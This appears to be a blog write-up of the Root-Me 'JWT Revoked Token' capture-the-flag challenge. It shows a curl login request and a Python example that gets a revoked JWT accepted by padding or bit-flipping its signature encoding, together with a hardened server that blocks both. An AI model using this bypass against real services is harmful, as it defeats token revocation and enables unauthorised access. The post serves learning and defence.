Friday, May 22, 2020

[Root-Me] JWT Revoked Token

Hi guys, after nearly two months of not caring about Root-Me challenges, I came back to it and realized that some challenges had recently been added to the Web Serveur category. I decided to play with JWT again. 😃



25 points, not too hard, huh? I thought so. And after solving this challenge, I have to say: "It's not really hard, but very tricky". Let's see!





Based on the links and methods given, I first open the URL in the browser.





Of course this method is not accepted! I fire up ZAP 2.9.0, my baby, to send a POST request to this URL instead:





OK! Next step: I send a request containing the credentials they ask for. JSON data, of course.


{"data":{"username":"admin","password":"admin"}}

But I receive the same result: Bad Request!
After a few minutes, I realize that I must add a header to the request when sending JSON data:


Content-Type: application/json


Okay, a little bit different 😂

When I review the source code, I am sure that once we send credentials to the server, the web server should send back the access token.




But I don't see it anywhere and have no idea where it is.
Trick 1: Use curl

After googling and reviewing the source code, I decide to use curl to resend the data to the server:
curl -H "Content-Type: application/json" -X POST -d '{"username":"admin","password":"admin"}' http://challenge01.root-me.org/web-serveur/ch63/login
And I get the access token!





If you immediately submit this JWT, you will lose it. Seriously, I can prove it right now 😄





When the server generates a token for you, that token is put on the blacklist immediately! So if you send it back to the server without any change, it is rejected as revoked.

I tried many things, including writing a payload, cracking the JWT and every crazy thing I could think of, and it still did not work: the server does not accept any token that has been edited, cracked, etc. The core of the problem is that you must send a modified token, yet the server must not notice any difference. But how?

Trick 2: RFC 4648

And fortunately, I figured it out after being stuck for half a day. I must change the token itself, not its content.
HINT: JWT is made of Base64 encoding, right? My name, 4rth4s, Base64-encodes to NHJ0aDRz, and NHJ0aDRz is equivalent to NHJ0aDRz== in some cases, right? You have 3 minutes to change it.
In other words: the segments of a JWT are base64url (RFC 4648 section 5) with the padding stripped, a lenient decoder still accepts a token with extra padding and decodes it to the same bytes, but a blacklist that stores the raw token string no longer finds a match.
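To make the hint concrete, here is an added example (my own code, not the challenge's server and not the author's solution) that models what the post describes: an HS256 token, a constructed secret, a server that blacklists the raw token string the moment it issues it, and a base64url decoder as tolerant as those in common JWT libraries. It goes beyond the post in two ways: besides the "=" padding trick it also flips the unused bits of the signature's last character, which a lenient decoder silently discards, and it shows a hardened variant that accepts only canonical base64url and keys its blacklist on the decoded signature bytes. The secret, the claims, the method names and the exact blacklist mechanics are assumptions.

```python
"""Re-encoding a revoked JWT so a lenient verifier accepts it. Added example, not
the Root-Me challenge code. Assumed: HS256, a constructed secret, a server that
blacklists the raw token string on issue (as the post observed), lenient decoding."""
import base64
import hashlib
import hmac
import json
import re

SECRET = b"demo-secret-not-the-challenge-key"  # constructed, not the real key
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"

def b64url_encode(data):
    """RFC 7515 base64url: RFC 4648 section 5 alphabet with '=' stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode_lenient(segment):
    """Tolerant: drop any '=', re-pad, let Python discard stray trailing bits,
    so 'NHJ0aDRz' and 'NHJ0aDRz==' both give b'4rth4s'."""
    segment = segment.rstrip("=")
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_decode_strict(segment):
    """Canonical only: alphabet check, no '=', and the bytes must re-encode to
    exactly the input (which catches stray bits in the last character)."""
    if not re.fullmatch(r"[A-Za-z0-9_-]*", segment):
        raise ValueError("character outside the base64url alphabet")
    raw = b64url_decode_lenient(segment)
    if b64url_encode(raw) != segment:
        raise ValueError("non-canonical base64url segment")
    return raw

def issue_token(claims):
    compact = {"separators": (",", ":")}
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    payload = b64url_encode(json.dumps(claims, **compact).encode())
    signing_input = f"{header}.{payload}"
    sig = hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"

def verify(token, decode):
    """HS256 check. The MAC covers header and payload exactly as received (RFC
    7515), so only the signature segment can be re-encoded without breaking it."""
    try:
        h, p, s = token.split(".")
        expected = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(decode(s), expected):
            return None
        claims = json.loads(decode(p))
        return claims if isinstance(claims, dict) else None
    except ValueError:  # bad split, bad base64, bad UTF-8 or bad JSON
        return None

def flip_unused_bits(token):
    """Beyond the post's '=' trick: a 43-char signature (32-byte HMAC) ends in a
    character with 4 data bits and 2 unused ones. A lenient decoder discards the
    unused bits, so XOR-ing them changes the string but not the decoded bytes."""
    h, p, s = token.split(".")
    assert len(s) % 4 == 3, "only valid when the last char has 2 unused bits"
    return f"{h}.{p}.{s[:-1]}{ALPHABET[ALPHABET.index(s[-1]) ^ 0b11]}"

class Server:
    """strict=False: what the post describes (raw token string blacklisted on
    issue, revocation by string equality, tolerant base64url). strict=True:
    canonical base64url only, blacklist keyed on the decoded signature bytes."""
    def __init__(self, strict):
        self.strict, self.revoked = strict, set()
        self.decode = b64url_decode_strict if strict else b64url_decode_lenient

    def key(self, token):
        return self.decode(token.split(".")[2]) if self.strict else token

    def login(self, username):
        token = issue_token({"sub": username})
        self.revoked.add(self.key(token))  # revoke-on-issue, as in the challenge
        return token

    def admin(self, token):
        claims = verify(token, self.decode)
        if claims is None:
            return "invalid"
        if self.key(token) in self.revoked:
            return "revoked"
        return "flag" if claims.get("sub") == "admin" else "forbidden"

def demo():
    """Run unmodified, '='-padded and bit-flipped tokens against both servers."""
    results = {}
    for name, server in (("lenient", Server(strict=False)), ("hardened", Server(strict=True))):
        token = server.login("admin")
        results[f"{name}_unmodified"] = server.admin(token)
        results[f"{name}_padded"] = server.admin(token + "=")
        results[f"{name}_bitflip"] = server.admin(flip_unused_bits(token))
    return results

if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:20s} {outcome}")
```

Run it and the lenient server answers revoked, flag, flag for the unmodified, padded and bit-flipped tokens, while the hardened one answers revoked, invalid, invalid. Only the signature segment can be re-encoded this way: the HMAC is computed over the header and payload segments exactly as they arrive, so padding either of those breaks the signature check rather than the blacklist.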
Keep going; I got the flag 😇
Hope you will too!







Happy Hacking!




